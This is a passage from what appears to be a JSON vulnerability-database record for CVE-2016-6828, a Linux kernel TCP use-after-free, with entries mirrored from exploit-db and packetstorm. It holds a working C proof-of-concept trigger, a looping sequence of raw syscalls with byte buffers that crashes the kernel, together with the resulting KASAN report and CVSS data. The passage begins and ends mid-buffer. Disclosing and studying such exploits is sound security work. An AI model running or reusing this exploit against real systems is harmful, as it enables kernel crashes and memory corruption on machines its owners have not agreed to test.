\xa3\\x94\\x6b\\x72\\xd9\\xc6\\xfa\\x6a\\x49\\x12\\xc7\\xc2\\x74\\x3f\\xc4\\x39\\x9f\\xa0\\x7e\\xcd\\x81\\x9c\\x54\\x0f\\x14\\xce\\xd3\\x7e\\xd8\\xe8\\xd2\\xc2\\x24\\x2e\\xc5\\x1b\\x58\\xf8\\x8e\\xe6\\xaa\\x16\\x69\\x6c\\x4b\\x40\\x86\\x1a\\x1a\\xad\\x11\\x6f\\x90\\x48\\x68\\x93\\xb1\\x8f\\xbd\\xaf\\x8d\\x00\\x09\\x5e\\xf4\\xe3\\x03\\x59\\xff\\x8f\\xf5\\xf0\\xe2\\xa1\\x79\\x93\\xf5\\x76\\xcb\\x56\\x93\\xb8\\xe6\\x22\\xe5\\x69\\x90\\x3d\\x0f\\x9b\\x57\\x86\\x19\\xf7\\x63\\xd5\\x2c\\xfe\\xad\\x63\\x60\\x9e\\x9e\\x29\\x04\\xe9\\x4d\\xb6\\xd9\\xb1\\xdb\\x42\\x2d\\x8b\\x8d\\x6d\\xdd\\xae\\x0b\\xca\\x58\\x38\\xf4\\x30\\xad\\xae\\xa3\\x3d\\x64\\x47\\xe0\\x77\\xc3\\xed\\xc8\\xe0\\x7d\\x3c\\x6c\\xda\\xbd\\x47\\x5e\\x37\\xb4\\xe4\\xb8\\x1c\\x69\\x16\\xb6\\xd5\\x8b\\x9a\\x15\\xfa\\x6b\\x21\\x88\\x74\\xbb\\xdf\\xe3\\xbe\\x31\\x02\\x8e\\x82\\x81\\x10\\x98\\x24\\x74\\x04\\xad\\xe3\\xc5\\x63\\x57\\x0d\\x58\\xbe\\x1c\\x97\\xa1\\x0d\\xb6\\x55\\x83\\x18\\x41\\x37\\xa7\\x1b\\x51\\x37\\x13\\x99\\xeb\\x6f\\xe3\\x70\\xc2\\x4a\\x8c\\x17\\xc6\\x30\\x8d\\x01\\xfe\\xd4\\x71\\x4c\\xee\\x82\\x94\\xe4\\x1d\\x9a\\x8a\\xed\\x48\\x61\\xba\\x6c\\x63\\x5f\\x3b\\x13\\x9f\\x5b\\xe4\\x0b\\x2c\\x44\\x1c\\xb7\\xf6\\xc7\\x64\\xf6\\x74\\x4a\\x16\\x7a\\x35\\xf7\\x2e\\x9d\\x4f\\x00\\x38\\xa7\\xad\\xe7\\x17\\x0c\\xb7\\x3f\\x02\\x41\\xe9\\xa3\\x37\\x5b\\x98\\xd5\\x0f\\xc6\\xe6\\xd1\\x38\\x4e\\x87\\x4f\\x2f\\x02\\xa1\\x27\\x4d\\xb2\\x03\\xfc\\x50\\x48\\xaa\\x33\\x92\\xe1\\x10\\xa6\\x0b\\xb0\\x20\\x7c\\x57\\xd4\\x85\\x55\\x51\\x6e\\x7e\\xdf\\xa2\\x46\\xf5\\x94\\x93\\x03\\x02\\xdb\\x94\\x55\\x23\\xd9\\x5b\\x99\\x2b\\x3a\\x7e\\x7d\\xb1\\x80\\x47\\xf9\\x77\\xee\\x0f\\x5e\\x63\\x7f\\x1e\\x96\\xdf\\xf9\\x1c\\x81\\x55\\xdd\\x02\\x81\\x87\\xc8\\x04\\x52\\x59\\x49\\xd4\\x08\\xd5\\x73\\x43\\x3f\\xd2\\xf9\\xa9\\xf0\\xd7\\xb9\\x97\\x86\\x9c\\x0a\\xc6\\x7d\\x5a\\x98\\x88\\x2b\\x0b\\x38\\xa1\\xcb\\xf8\\x71\\xc7\\x5d\\xfe\\xba\\xd0\\x26\\x4b\\xdf\\xb8\\x11\\x8f\\x71\\x60\\x68\\xc7\\x82\\xd0\\x36\\x97\\x23\\x56\\xda\\x52\\x58\\x90\\x0a\\x42\\x0b\\xfc\\xf8\\xc9\\x1f\\x36\\x7f\\x9f\\xe5\\x5b\\xf8\\x6e\\xe1\\x78\\x47\\xfe\\x6b\\x00\\xcd\\xe5\\x6b\\xe2\\xa6\\xaf\\x2b\\x33\\x95\\x73\\x79\\x52\\x13\\x1c\\x87\\x3d\\x8d\\xbc\\x32\\x1e\\x11\\x25\\x91\\x51\\xa0\\xaf\\xcc\\xf1\\xc3\\x5a\\xea\\x8b\\x15\\x82\\x76\\xa9\\x0f\\xe7\\x08\\x73\\x53\\x02\\x4c\\x8c\\xb2\\x8d\\x4b\\xa0\\xed\\x37\\x20\\x7f\\x54\\xa2\\x2a\\x33\\x6b\\x5f\\x3a\\x4f\\x54\\x61\\x85\\x91\\x86\\x68\\x5a\\xd4\\x80\\xc9\\x21\\xa9\\x16\\x5d\\x77\\xee\\x28\\xeb\\xc2\\x5c\\x22\\xe4\\x27\\xdb\\x5b\\xe4\\xa7\\x70\\xdc\\x6a\\x8e\\xd9\\xe7\\x77\\x09\\x5b\\x94\\x97\\xc6\\xf4\\x1f\\x7a\\x35\\x9e\\x26\\x1e\\x8b\\x37\\xe3\\xa4\\xdc\\x0a\\x8a\\x19\\x59\\x3a\\x77\\x81\\x2d\\x9b\\x0e\\x51\\x2b\\xd7\\xc5\\xbc\\x07\\xfa\\xf3\\x29\\x79\\x35\\x98\\xe3\\xb8\\xf7\\xe5\\x40\\xdf\\xa8\\x93\\x00\\xf6\\x53\\x8c\\xcc\\x33\\xdf\\x0e\\x35\\x3e\\x72\\x8d\\x48\\x85\\x05\\x40\\x43\\xe1\\x13\\xd6\\x4a\\x95\\x50\\xf8\\x32\\xca\\xc3\\x1c\\x28\\xd4\\x41\\x15\\x64\\xc1\\x08\\xfb\\x2c\\xc2\\x1f\\x79\\x30\\x58\\xaa\\x7c\\x0d\\x83\\x8e\\x87\\xf4\\x2e\\xa3\\xfc\\xeb\\xd0\\xdb\\xcc\\x15\\xcd\\x88\\x99\\x41\\x75\\x13\\xc1\\x0c\\x53\\x96\\xfe\\xff\\xeb\\x87\\x6a\\x04\\x75\\xf2\\x98\\x40\\x7e\\xc7\\x4e\\x47\\x63\\x31\\x2f\\xb2\\xa2\\x88\\x30\\xca\\x49\\xfb\\x57\\x40\\x65\\x8c\\xc9\\x80\\x20\\xb9\\xc9\\xfc\\x79\\x12\\x8d\\xe6\\x24\\x24\\x5f\\x38\\x47\\x3c\\x93\\x64\\x41\\x9a\\xf2\\xe8\\xab\\xc1\\xaf\\x13\\x95\\x5c\\x26\\x4e\\x02\\x99\\x5f\\x6a\\xe3\\xd4\\x91\\x0a\\xf5\\x06\\x3a\\x2d\\xc9\\x22\\x96\\x6b\\xa0\\x77\\x00\\x77\\x7c\\x26\\xdc\\xb6\\xc1\\x1b\\x6c\\xc8\\xfe\\x43\\x2c\\xe2\\xdc\\x58\\x7e\\x30\\x38\\x98\\x97\\xdf\\xda\\xae\\x9d\\x40\\x94\\xb7\\x16\\x91\\x66\\x94\\x6c\\x2a\\x50\\x39\\x69\\xce\\xb4\\x5c\\xec\\x2e\\x60\\x71\\x92\\xa3\\x14\\x1f\\x08\\x70\\xcb\\x9c\\x47\\x5b\\xf3\\xf4\\xea\\x7a\\x34\\x43\\x32\\x8b\\x19\\x57\\xd2\\xe7\\x1c\\xc5\\xeb\\xa5\\x66\\x37\\x73\\x80\\x59\\xac\\x1e\\xc0\\x2f\\xf1\\x30\\xf4\\xd0\\xc7\\x78\\x2b\\x38\\xd3\\xab\\x74\\xfd\\x4d\\xdf\\x5e\\xc5\\xa7\\x89\\x1b\\xb7\\x76\\xf5\\xf9\\xfd\\xca\\xfc\\xc2\\x0d\", 4096);\r\n r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul);\r\n r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n *(uint32_t*)0x20022fdd = (uint32_t)0x28;\r\n *(uint32_t*)0x20022fe1 = (uint32_t)0x400;\r\n *(uint64_t*)0x20022fe5 = (uint64_t)0x0;\r\n *(uint64_t*)0x20022fed = (uint64_t)0x8ab;\r\n *(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;\r\n *(uint16_t*)0x20022ffd = (uint16_t)0x5;\r\n r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);\r\n } else if (pid > 0) {\r\n int returnStatus;\r\n waitpid(pid, &returnStatus, 0);\r\n printf(\"collected child\\n\");\r\n } else {\r\n printf(\"fork failed\\n\");\r\n exit(1);\r\n }\r\n }\r\n return 0;\r\n}\r\n\r\n\r\n// KASAN report on v4.8-rc1, equivalent on master\r\n\r\n/*\r\n[ 21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428\r\n[ 21.447953] Read of size 4 by task rsyslogd/1612\r\n[ 21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G B 4.8.0-rc1 #1\r\n[ 21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014\r\n[ 21.450270] 0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151\r\n[ 21.451135] ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400\r\n[ 21.452002] ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400\r\n[ 21.452873] Call Trace:\r\n[ 21.453142] <IRQ> [<ffffffff81bef151>] dump_stack+0x83/0xb2\r\n[ 21.453835] [<ffffffff815d0351>] kasan_object_err+0x21/0x70\r\n[ 21.454450] [<ffffffff815d05f4>] kasan_report_error+0x204/0x500\r\n[ 21.455135] [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70\r\n[ 21.455899] [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0\r\n[ 21.456624] [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0\r\n[ 21.457329] [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120\r\n[ 21.458028] [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0\r\n[ 21.458590] [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0\r\n[ 21.459189] [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0\r\n[ 21.459804] [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0\r\n[ 21.460540] [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20\r\n[ 21.461237] [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0\r\n[ 21.461865] [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210\r\n[ 21.462581] [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0\r\n[ 21.463167] [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0\r\n[ 21.463884] [<ffffffff815cfaa5>] ? memcpy+0x45/0x50\r\n[ 21.464414] [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0\r\n[ 21.465057] [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240\r\n[ 21.465719] [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0\r\n[ 21.466326] [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0\r\n[ 21.466954] [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120\r\n[ 21.467591] [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410\r\n[ 21.468231] [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0\r\n[ 21.468836] [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550\r\n[ 21.469462] [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0\r\n[ 21.470179] [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0\r\n[ 21.470953] [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50\r\n[ 21.471600] [<ffffffff82b8396a>] ip6_input+0xda/0x1f0\r\n[ 21.472149] [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90\r\n[ 21.472870] [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50\r\n[ 21.473521] [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0\r\n[ 21.474210] [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0\r\n[ 21.474858] [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340\r\n[ 21.475487] [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750\r\n[ 21.476043] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0\r\n[ 21.476615] [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20\r\n[ 21.477332] [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50\r\n[ 21.478956] [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500\r\n[ 21.479618] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0\r\n[ 21.480250] [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0\r\n[ 21.481017] [<ffffffff812092c0>] ? update_curr+0x150/0x4e0\r\n[ 21.481700] [<ffffffff82937c90>] ? netdev_info+0x120/0x120\r\n[ 21.482339] [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280\r\n[ 21.482969] [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350\r\n[ 21.483619] [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420\r\n[ 21.484295] [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40\r\n[ 21.485101] [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0\r\n[ 21.485739] [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170\r\n[ 21.486383] [<ffffffff8293e1a7>] process_backlog+0x197/0x580\r\n[ 21.487021] [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0\r\n[ 21.487615] [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0\r\n[ 21.488258] [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20\r\n[ 21.488909] [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110\r\n[ 21.489471] [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30\r\n[ 21.490147] [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340\r\n[ 21.490868] [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d\r\n[ 21.491470] [<ffffffff811769d7>] irq_exit+0x117/0x140\r\n[ 21.492035] [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0\r\n[ 21.492712] [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90\r\n[ 21.493378] <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424\r\n[ 21.494277] Allocated:\r\n[ 21.494538] PID = 1711\r\n[ 21.494801] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50\r\n[ 21.495416] [<ffffffff815cf6e6>] save_stack+0x46/0xd0\r\n[ 21.495970] [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0\r\n[ 21.496572] [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20\r\n[ 21.497185] [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0\r\n[ 21.497853] [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0\r\n[ 21.498475] [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790\r\n[ 21.499129] [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10\r\n[ 21.499754] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350\r\n[ 21.500371] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110\r\n[ 21.500988] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0\r\n[ 21.501625] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640\r\n[ 21.502249] [<ffffffff8162e315>] vfs_write+0x175/0x4a0\r\n[ 21.502838] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0\r\n[ 21.503429] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8\r\n[ 21.504144] Freed:\r\n[ 21.504368] PID = 1711\r\n[ 21.504628] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50\r\n[ 21.505290] [<ffffffff815cf6e6>] save_stack+0x46/0xd0\r\n[ 21.505879] [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0\r\n[ 21.506501] [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210\r\n[ 21.507128] [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0\r\n[ 21.507752] [<ffffffff828f3e22>] __kfree_skb+0x22/0x30\r\n[ 21.508339] [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10\r\n[ 21.508962] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350\r\n[ 21.509574] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110\r\n[ 21.510194] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0\r\n[ 21.510818] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640\r\n[ 21.511408] [<ffffffff8162e315>] vfs_write+0x175/0x4a0\r\n[ 21.512003] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0\r\n[ 21.512562] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8\r\n[ 21.513258] Memory state around the buggy address:\r\n[ 21.513770] ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n[ 21.514546] ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc\r\n[ 21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.516114] ^\r\n[ 21.516611] ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.517400] ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.518203] ==================================================================\r\n*/", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40731/"}], "packetstorm": [{"lastseen": "2016-12-05T22:20:26", "description": "", "published": "2016-11-09T00:00:00", "type": "packetstorm", "title": "Linux Kernel TCP Related Read Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6828"], "modified": "2016-11-09T00:00:00", "id": "PACKETSTORM:139642", "href": "https://packetstormsecurity.com/files/139642/Linux-Kernel-TCP-Related-Read-Use-After-Free.html", "sourceData": "`// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html \n \n// to build clang derp4.c -o derp4 -static \n \n#include <unistd.h> \n#include <sys/syscall.h> \n#include <string.h> \n#include <stdint.h> \n#include <pthread.h> \n#include <stdio.h> \n \n#ifndef SYS_mmap \n#define SYS_mmap 9 \n#endif \n#ifndef SYS_socket \n#define SYS_socket 41 \n#endif \n#ifndef SYS_bind \n#define SYS_bind 49 \n#endif \n#ifndef SYS_sendto \n#define SYS_sendto 44 \n#endif \n#ifndef SYS_setsockopt \n#define SYS_setsockopt 54 \n#endif \n#ifndef SYS_dup \n#define SYS_dup 32 \n#endif \n#ifndef SYS_sendmsg \n#define SYS_sendmsg 46 \n#endif \n#ifndef SYS_recvfrom \n#define SYS_recvfrom 45 \n#endif \n#ifndef SYS_write \n#define SYS_write 1 \n#endif \n \nlong r[62]; \n \n \nint main(int argc, char **argv) \n{ \nwhile (1) { \npid_t pid = fork(); \n \nif (pid == 0) { \nr[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); \nr[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0); \nmemcpy((void*)0x20006000, \"\\x0a\\x00\\xab\\x12\\xc7\\x17\\x1c\\x83\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x4f\\xdc\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", 128); \nr[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0); \nr[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); \nmemcpy((void*)0x20012f5a, \"\\x25\\xf9\\x1b\\xd4\\xeb\\xf5\\x39\\x3c\\xd5\\x80\\xf6\\xf0\\xd6\\xe1\\xff\\x65\\x30\\x97\\xac\\xaf\\x1b\\xbc\\xc8\\xae\\xa4\\x1e\\xab\\xd8\\x60\\x51\\xcb\\x4b\\xed\\xae\\xaa\\x37\\xda\\x80\\xf9\\x06\\xb8\\x6b\\xdf\\x78\\x0f\\xd0\\x87\\xf2\\x65\\x5f\\x5e\\x85\\xb5\\x4d\\x6b\\x48\\xff\\xf3\\x0d\\x46\\x1c\\xe5\\xa4\\x48\\x38\\x78\\x18\\x71\\x9b\\x75\\xc4\\xc9\\x77\\xf2\\xc4\\x5f\\x88\\x8e\\xd2\\x8d\\x97\\x26\\x56\\x4c\\x93\\x31\\xbc\\x64\\x22\\xff\\xdc\\x68\\x01\\x74\\x43\\xea\\x84\\x6f\\x1d\\x90\\xeb\\x98\\x6c\\xe9\\x1c\\x3b\\x72\\xab\\xa0\\xb5\\x5b\\xe8\\xee\\xfb\\xf3\\x2d\\x96\\xa0\\xd4\\x13\\x55\\xbc\\xd4\\xe0\\x41\\xfd\\x78\\x7e\\x90\\xf9\\x9f\\x9c\\x57\\x32\\x47\\xf2\\xcf\\x7f\\x4a\\x7b\\x79\\x0a\\xdd\\xb4\\xce\\xbd\\x0b\\x44\\x02\\x95\\x0f\\xaf\\x50\\xff\\x87\\x90\\x09\\xaa\\x94\\x01\\x41\\x43\\x08\\x8e\\xb1\", 165); \nmemcpy((void*)0x20020000, \"\\x0a\\x00\\xab\\x12\\x0d\\xf5\\xba\\x69\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xac\\xad\\xce\\xa0\", 28); \nr[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul); \n*(uint32_t*)0x20001fff = (uint32_t)0x2; \nr[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0); \nr[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0); \n*(uint32_t*)0x20018000 = (uint32_t)0x4; \nr[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0); \n*(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000; \n*(uint32_t*)0x2000dfd0 = (uint32_t)0xc; \n*(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000; \n*(uint64_t*)0x2000dfe0 = (uint64_t)0x1; \n*(uint64_t*)0x2000dfe8 = (uint64_t)0x0; \n*(uint64_t*)0x2000dff0 = (uint64_t)0x0; \n*(uint32_t*)0x2000dff8 = (uint32_t)0x4; \n*(uint16_t*)0x2000e000 = (uint16_t)0x0; \n*(uint16_t*)0x2000e002 = (uint16_t)0x0; \n*(uint32_t*)0x2000e004 = (uint32_t)0xffff; \n*(uint32_t*)0x2000e008 = (uint32_t)0x401; \n*(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a; \n*(uint64_t*)0x20000008 = (uint64_t)0x37; \n*(uint32_t*)0x2000ed3a = (uint32_t)0x14; \n*(uint16_t*)0x2000ed3e = (uint16_t)0x2; \n*(uint16_t*)0x2000ed40 = (uint16_t)0x12; \n*(uint32_t*)0x2000ed42 = (uint32_t)0x1f; \n*(uint32_t*)0x2000ed46 = (uint32_t)0x7; \n*(uint8_t*)0x2000ed4a = (uint8_t)0x6; \n*(uint8_t*)0x2000ed4b = (uint8_t)0x100; \n*(uint8_t*)0x2000ed4c = (uint8_t)0x3f; \n*(uint32_t*)0x2000ed4d = (uint32_t)0x11; \n*(uint16_t*)0x2000ed51 = (uint16_t)0x0; \n*(uint16_t*)0x2000ed53 = (uint16_t)0x808; \n*(uint32_t*)0x2000ed55 = (uint32_t)0x1; \n*(uint32_t*)0x2000ed59 = (uint32_t)0x0; \n*(uint8_t*)0x2000ed5d = (uint8_t)0x0; \n*(uint32_t*)0x2000ed5e = (uint32_t)0x12; \n*(uint16_t*)0x2000ed62 = (uint16_t)0x2ea; \n*(uint16_t*)0x2000ed64 = (uint16_t)0x200; \n*(uint32_t*)0x2000ed66 = (uint32_t)0x5; \n*(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff; \n*(uint8_t*)0x2000ed6e = (uint8_t)0x9; \n*(uint8_t*)0x2000ed6f = (uint8_t)0x1; \nr[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0); \n*(uint16_t*)0x20001003 = (uint16_t)0x1; \n*(uint8_t*)0x20001005 = (uint8_t)0x0; \n*(uint32_t*)0x20001007 = (uint32_t)0x9; \nr[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul); \nmemcpy((void*)0x20015285, \"\\xed\\xe0\\xf1\\x03\\xbd\\x1d\\xe2\\x8d\\x13\\x62\\xc9\\x11\\xde\\x3b\\x55\\xb1\\xb2\\x26\\x95\\xb2\\x3f\\x32\\x96\\x8a\\x3d\\xf7\\xd4\\x2c\\xd9\\x32\\xae\\x05\\x9a\\x60\\x09\\xbc\\x49\\x63\\x6a\\x45\\xd5\\x6f\\xa8\\x4b\\xaf\\x8a\\x66\\xf3\\x35\\xad\\xe6\\x68\\x85\\xd4\\x7e\\xe5\\x7c\\x7e\\x06\\xbf\\x32\\xfb\\xf9\\xd2\\x9f\\x40\\xa3\\x0a\\xa0\\x93\\x09\\x73\\x39\\x7d\\xac\\x3c\\x8d\\x83\\xe0\\x0c\\x5e\\xa2\\x36\\x9b\\x9c\\xb4\\x62\\xe8\\x39\\x07\\xd8\\x71\\xc1\\x2f\\x6f\\x18\\xfa\\x8a\\x5d\\x06\\xb4\\x46\\xa2\\x97\\x79\\x81\\xb2\\x85\\xd4\\x4f\\x6b\\x48\\xc4\\xf5\\xdd\\xa8\\x8d\\x10\\x74\\x01\\xe1\\x58\\xb2\\x82\\x72\\xc4\\xb6\\xb2\\xf7\\xaa\\x90\\x9c\\x9f\\x61\\x95\\x87\\x7b\\x99\\xc5\\xa5\\x53\\xbc\\xab\\xdb\\xdb\\x5e\\x32\\xb8\\xc3\\xee\\xd3\\xda\\x7a\\xf2\\x5c\\xc5\\x1a\\xf1\\xd6\\x1b\\x53\\xad\\x24\\xd0\\xa0\\xc0\\x0d\\x73\\x9e\\x81\\x7e\\x4e\\x82\\xf5\\xa9\\x73\\x3c\\x7a\\x5c\\x6e\\x4c\\x48\\x7d\\x42\\xf5\\x2f\\x68\\xf9\\x7e\\xa9\\xd8\\x6a\\x64\\x78\\x08\\x7a\\x37\\xe9\\xd3\\x81\\x15\\x34\\x63\\x63\\x14\\xb7\\x1a\\x43\\x9b\\x4f\\x85\\xfa\\x88\\x5c\\xe1\\x1e\\xce\\x87\\x95\\xe1\\x81\\xc8\\x06\\xaf\\x1a\\x64\\x26\\x36\\x83\\x36\\xef\\x71\\x0c\\x2a\\xda\\xe4\\xff\\xa1\\x87\\xc2\\x04\\x96\\x1c\\x72\\xd9\\x2d\\xf0\\xce\\x46\\xd4\\x3a\\xd1\\xc7\\x2f\\x60\\x25\\xf8\\x33\\x1f\\x38\\x7a\\x46\\xb1\\x43\\xa4\\xd2\\x65\\x77\\x47\\x85\\xe9\\xad\\x52\\xdb\\x8b\\x93\\x23\\xf1\\xf9\\xa9\\x5f\\xe4\\xf8\\x39\\x82\\xc5\\xb4\\xe1\\x5b\\x87\\xa0\\xfd\\x2c\\xc2\\x84\\x15\\x78\\xaa\\x9b\\x3f\\xe5\\x75\\x6e\\x05\\xef\\x84\\x4c\\x6b\\x9d\\x1d\\x9e\\x7c\\x92\\x3b\\x55\\xcb\\x01\\x6f\\xc5\\x9a\\xd8\\xc3\\x91\\x39\\x95\\xd7\\x8f\\xe9\\x87\\x15\\x27\\xe7\\x19\\xa8\\x18\\x24\\xfd\\x09\\x11\\x49\\x41\\xc6\\xd2\\xe9\\x1a\\xf4\\xb0\\x9b\\x85\\x9b\\x3f\\xb1\\xf3\\xc3\\x48\\xc5\\xe7\\x45\\x0b\\x21\\x2d\\x32\\x27\\x92\\x3c\\x39\\x52\\x0f\\x2b\\xdf\\x52\\x66\\x6f\\x01\\x8f\\xdc\\xfa\\x8f\\x5e\\x53\\xb7\\x82\\x23\\x79\\xfa\\x28\\xe5\\x24\\xa7\\x5e\\x2a\\x24\